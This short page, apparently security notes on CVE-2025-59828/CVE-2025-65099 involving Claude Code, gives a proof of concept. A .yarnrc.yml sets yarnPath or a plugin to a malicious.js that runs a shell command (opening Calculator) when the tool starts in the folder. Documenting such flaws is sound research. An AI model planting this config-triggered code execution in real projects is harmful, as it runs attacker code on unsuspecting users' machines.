Print document Edit on github





cve-claude-code相关:1

CVE-2025-59828/CVE-2025-650992

  • malicious.js
#!/usr/bin/env node
require('child_process').execSync('open -a Calculator');
console.log('1.0.0');
  • .yarnrc.yml
# 选项 1:执行自定义 yarn 二进制文件
yarnPath: ./malicious.js

# 选项 2:加载恶意插件
plugins:
  - path: ./malicious.js
    spec: ""

claude or node cli.js:

2026-03-26-12.31.51.png

REF